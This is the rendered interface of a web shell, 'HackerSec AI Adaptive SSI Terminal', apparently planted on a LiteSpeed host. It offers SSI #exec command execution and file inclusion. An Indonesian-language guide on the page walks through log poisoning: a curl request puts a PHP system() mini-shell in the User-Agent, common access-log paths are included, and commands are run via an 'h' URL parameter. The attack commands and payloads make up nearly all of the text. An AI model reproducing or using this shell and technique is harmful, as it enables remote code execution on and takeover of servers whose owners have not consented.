HackerSec AI Adaptive SSI Terminal v2026.4

SERVER ROOT: /home/sannicwu/public_html

SERVER SOFTWARE: LiteSpeed

REMOTE ADDRESS: 216.73.216.42

SSI #exec CAPABILITY TEST

TEST RESULT:


    Click "TEST #exec" to check capability.

            
SSI #exec status: UNKNOWN. Run test above!

EXECUTE COMMANDS (If #exec is ALIVE)

COMMAND OUTPUT:


    No command executed yet, bro. Enter one above!

            

WARNING: Jika #exec dimatikan, perintah di atas tidak akan jalan.

FILE INCLUSION (Crucial for Log Poisoning if #exec is DEAD)

INCLUDED FILE CONTENT:


    No file included yet, bro. Enter a path above!

            

HackerSec AI Log Poisoning Guide (If #exec is DEAD)

Jika fitur SSI #exec di atas tidak berfungsi (tidak ada output dari test command), maka server LiteSpeed lo sangat aman dari #exec. Tapi jangan khawatir, kita punya teknik Log Poisoning untuk Remote Code Execution (RCE) via #include!

1. INJECT KODE PHP MINI-SHELL KE LOG FILE:

Gunakan `curl` dari terminal lo untuk mengirim request ke server target dengan User-Agent yang berisi kode PHP mini-shell. Contoh:

curl -A "<?php system(\$_GET[\'h\']); ?>" http://target.com/index.html

PENTING:

2. IDENTIFIKASI PATH LOG FILE:

Gunakan bagian "FILE INCLUSION" di shell ini. Masukkan path-path log umum (misal: `/var/log/apache2/access.log`, `/var/log/httpd/access_log`). Jika berhasil, lo akan melihat isi log file.

Contoh path log: /var/log/apache2/access.log

3. EKSEKUSI PERINTAH VIA LOG FILE YANG TERPOLUSI:

Setelah lo berhasil meng-include log file yang sudah diinjeksi PHP, lo bisa menjalankan perintah dengan menambahkan parameter `&h=YOUR_COMMAND` ke URL shell SSI lo. Contoh:

http://target.com/path/hackersec_ssi_shell.shtml?include_file=/var/log/apache2/access.log&h=ls%20-la

HASILNYA: Server akan meng-include log file, PHP di dalam log itu akan dieksekusi, dan lo akan melihat output perintah di browser! PWNED!